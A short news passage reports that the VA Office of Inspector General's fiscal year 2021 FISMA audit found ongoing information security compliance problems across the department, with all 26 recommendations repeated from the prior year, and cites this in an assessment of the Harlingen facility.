The FISMA audit of VA's agencywide compliance for fiscal year 2021, released in April, found that the department as a whole "continues to face significant challenges in complying with FISMA due to the nature and maturity of its information security program.” OIG noted in Tuesday’s assessment of Harlingen that the FY2021 FISMA audit made 26 recommendations to VA, and that “all 26 recommendations were repeated from the prior year.”